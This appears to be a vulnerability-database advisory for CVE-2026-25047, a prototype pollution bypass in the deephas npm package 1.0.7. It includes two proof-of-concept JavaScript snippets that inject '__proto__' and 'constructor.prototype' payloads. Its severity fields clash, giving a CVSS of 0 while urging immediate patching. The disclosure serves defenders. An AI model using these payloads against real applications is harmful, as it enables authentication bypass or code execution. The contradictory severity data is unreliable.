What is the severity of CVE-2026-25047?

CVE-2026-25047 has a CVSS v3 score of 0, which is classified as Low severity.

Is there an exploit available for CVE-2026-25047?

Yes, there are known exploits available for CVE-2026-25047. Immediate patching is recommended.

Is there a patch available for CVE-2026-25047?

Yes, patches are available for CVE-2026-25047. Check the vendor advisories for update instructions.

CVE-2026-25047 - CVE Details, Severity, and Analysis

Published: February 16, 2026

Last updated:18 hours ago (February 16, 2026)

Updated February 16, 2026

Summary

A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.

Details

The vulnerability resides in the add() function and indexer() function implemented within deepHas.js. Although version 1.0.7 attempts to prevent prototype pollution by checking property ownership (e.g., using Object.hasOwnProperty) and by checking against forbidden string usage (using String.prototype.indexOf), this check can be bypassed as shown in the PoC

By doing so, an attacker can inject properties into Object.prototype through a payload such as constructor.prototype.polluted or proto.polluted resulting in prototype pollution.

This issue affects all JavaScript runtimes that rely on npm packages (including Node.js, Deno, and Bun) and is independent of the operating system.

PoC

Steps to reproduce

Install version 1.0.7 of deephas using npm install
Run one of the following code snippets:

//PoC 1
Object.prototype.hasOwnProperty = () => true;
console.log({}.polluted);
const dh = require('deephas');
let obj = {};
dh.set(obj, 'constructor.prototype.polluted', 'yes');
console.log('{ ' + obj.polluted + ', ' + 'yes' + ' }'); // prints yes => the patch is bypassed and prototype pollution occurred

//PoC 2
String.prototype.indexOf = () => -1;
console.log({}.polluted);
const dh = require('deephas');
let obj = {};
dh.set(obj, '__proto__.polluted', 'yes');
console.log('{ ' + obj.polluted + ', ' + 'yes' + ' }'); // prints yes => the patch is bypassed and prototype pollution occurred

Expected behavior

Prototype pollution should be prevented and {} should not gain new properties. This should be printed on the console:

undefined
undefined OR throw an Error

Actual behavior

Object.prototype is polluted and the property polluted becomes globally accessible. This is printed on the console:

undefined
yes

Impact

This is a prototype pollution vulnerability, which can have severe security implications depending on how deephas is used by downstream applications. Any application that processes attacker-controlled input using deephas.set may be affected. It could potentially lead to the following problems:

Authentication bypass
Denial of service
Remote code execution (if polluted property is passed to sinks like eval or child_process)

Strobes VI. (2026). CVE-2026-25047 - CVE Details and Analysis. Strobes VI. Retrieved February 17, 2026, from https://vi.strobes.co/cve/CVE-2026-25047